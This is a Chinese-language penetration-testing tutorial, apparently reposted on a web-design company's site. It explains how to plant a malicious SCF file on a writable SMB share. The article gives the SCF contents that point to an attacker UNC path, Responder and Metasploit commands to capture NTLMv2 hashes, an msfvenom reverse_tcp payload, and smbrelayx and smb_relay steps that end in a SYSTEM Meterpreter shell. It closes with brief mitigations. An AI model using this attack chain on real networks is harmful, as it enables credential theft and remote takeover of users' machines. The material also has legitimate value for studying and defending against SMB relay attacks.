如何利用SCF文件構(gòu)建網(wǎng)絡(luò)滲透，針對這個問題，這篇文章詳細(xì)介紹了相對應(yīng)的分析和解答，希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

10年積累的網(wǎng)站制作、做網(wǎng)站經(jīng)驗，可以快速應(yīng)對客戶對網(wǎng)站的新想法和需求。提供各種問題對應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識你，你也不認(rèn)識我。但先制作網(wǎng)站后付款的網(wǎng)站建設(shè)流程，更有錫林郭勒盟免費網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

SMB是一種廣泛用于企業(yè)組織中文件共享目的的網(wǎng)絡(luò)協(xié)議。在內(nèi)部的滲透測試中，發(fā)現(xiàn)包含明文密碼和數(shù)據(jù)庫連接字符串等敏感信息的共享文件并不罕見。但是，即使一個文件共享不包含任何可用于連接到其他系統(tǒng)的數(shù)據(jù)，但是未經(jīng)身份驗證的用戶配置擁有該文件的寫入權(quán)限，那么在這種情況下，攻擊者也可以獲得域用戶的密碼哈希值或Meterpreter shell。

收集哈希

SCF（Shell命令文件）文件可用于執(zhí)行一組有限的操作，例如顯示W(wǎng)indows桌面或打開Windows資源管理器，這并不是什么新鮮事。然而，一個SCF文件可以用來訪問一個特定的UNC路徑，允許滲透測試人員構(gòu)建攻擊。下面的代碼可以被放置在一個文本文件，然后需要被植入到網(wǎng)絡(luò)共享。

[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

   

SCF文件的內(nèi)容

將pentestlab.txt文件保存為SCF文件，并且要使該文件在用戶瀏覽文件時執(zhí)行。在文件名前面添加@符號可以將pentestlab.scf放在共享驅(qū)動器文件列表的頂部。

   

SCF文件

Responder需要使用以下參數(shù)執(zhí)行來捕獲瀏覽共享的用戶的哈希值。

responder -wrf --lm -v -I eth0

 
Responder – SCF的參數(shù)

當(dāng)用戶瀏覽共享時，將自動會從系統(tǒng)建立網(wǎng)絡(luò)連接，連接到包含在SCF文件內(nèi)的UNC路徑。Windows將嘗試使用用戶名和密碼對該共享進(jìn)行身份驗證。在驗證過程中，隨機的8字節(jié)質(zhì)詢密鑰會從服務(wù)器發(fā)送到客戶端，散列后的NTLM / LANMAN密碼再次使用這個質(zhì)詢密鑰進(jìn)行加密。Responder將捕獲NTLMv2哈希。

   

Responder -通過SCF抓取到的NTLMv2哈希

除了Responder，Metasploit Framework也有一個模塊，可以用來捕獲來自SMB客戶端的挑戰(zhàn) – 響應(yīng)密碼哈希。

auxiliary/server/capture/smb

 
Metasploit – 捕獲SMB的模塊

和之前一樣，用戶在瀏覽相同的共享時，他的密碼哈希將被Metasploit捕獲。

   

Metasploit -捕獲NTLMv2

如果公司內(nèi)部的密碼策略足夠低，攻擊者可能只需要幾天或幾個星期就能破解捕獲到的密碼散列。

Meterpreter Shell

上面的技術(shù)的主要優(yōu)點是它不需要與用戶有任何交互，并自動強制用戶連接到共享，在這個過程中不存在NTLMv2哈希的協(xié)商過程。因此，也可以將此技術(shù)與SMB中繼相結(jié)合，SMB中繼將提供有效載荷，可以從訪問該共享的每個用戶檢索Meterpreter Shell。

MSFVenom可用于生成將在目標(biāo)上執(zhí)行的有效載荷：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > pentestlab.exe

   

MSFVenom – 為SMB中繼生成的payload

Coresecurity已經(jīng)發(fā)布了一個名為Impacket的Python腳本，可以對SMB等Windows協(xié)議執(zhí)行各種攻擊。使用smbrelayx 這個python腳本可以設(shè)置中繼攻擊并在當(dāng)目標(biāo)主機嘗試連接SMB服務(wù)器時提供有效載荷。這將自動執(zhí)行，因為SCF文件將強制每個用戶使用他們自己的憑據(jù)連接到一個不存在的共享。

./smbrelayx.py -h Target-IP -e ./pentestlab.exe

   
   

Impacket – SMB中繼服務(wù)器

Metasploit框架需要使用并在目標(biāo)上執(zhí)行pentestlab.exe時接收連接。

exploit/multi/handler

模塊需要配置與生成的有效載荷相同的參數(shù)。

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit

       
   

Metasploit – 多處理程序模塊

當(dāng)用戶瀏覽共享時，SMB服務(wù)器將接收到連接，并且將使用用戶名和密碼散列來與他的系統(tǒng)進(jìn)行認(rèn)證，并將有效載荷執(zhí)行為可寫共享。

       
   

Impacket – SMB中繼攻擊

Meterpreter將收到一個會話。但是為了避免丟失連接，有必要遷移到更穩(wěn)定的進(jìn)程。

       
   

Meterpreter – 列出正在運行的進(jìn)程

需要使用遷移命令和進(jìn)程標(biāo)識。

       
   

Meterpreter – 進(jìn)程遷移

在這個例子中，進(jìn)程1600對應(yīng)于以SYSTEM權(quán)限運行的svchost.exe進(jìn)程。

       
   

Meterpreter – 遷移進(jìn)程列表

從Meterpreter控制臺運行g(shù)etuid將獲得當(dāng)前的UID，現(xiàn)在是SYSTEM。

       
   

Meterpreter – 檢索當(dāng)前的UID

Metasploit框架也可以實現(xiàn)同樣的攻擊。

exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
exploit

       
   

Metasploit – SMB中繼模塊

SMB服務(wù)器將建立一個通過使用用戶名和密碼哈希來驗證目標(biāo)的連接，在一個可寫共享上傳遞一個有效載荷，以用戶權(quán)限執(zhí)行作為一個服務(wù)的有效載荷，執(zhí)行清理并返回一個Meterpreter會話。

       
   

Metasploit – SMB中繼攻擊

可以使用sessions命令與現(xiàn)有會話執(zhí)行交互。

       
   

Metasploit – SMB中繼會話

這個技術(shù)利用了像共享這樣的所有網(wǎng)絡(luò)中很常見的東西，以便檢索密碼散列并獲取meterpreter shell。唯一的要求是用戶需要瀏覽包含惡意SCF文件的共享。但是，通過執(zhí)行以下操作可以防止這些攻擊：

· 使用Kerberos身份驗證和SMB簽名

· 不允許未經(jīng)身份驗證的用戶在文件共享中擁有寫入權(quán)限

· 確保使用NTLMv2密碼哈希代替LanMan

關(guān)于如何利用SCF文件構(gòu)建網(wǎng)絡(luò)滲透問題的解答就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，如果你還有很多疑惑沒有解開，可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關(guān)知識。

文章標(biāo)題：如何利用SCF文件構(gòu)建網(wǎng)絡(luò)滲透
文章來源：http://chinadenli.net/article0/ppccoo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供Google、、域名注冊、網(wǎng)站策劃、網(wǎng)站建設(shè)、響應(yīng)式網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)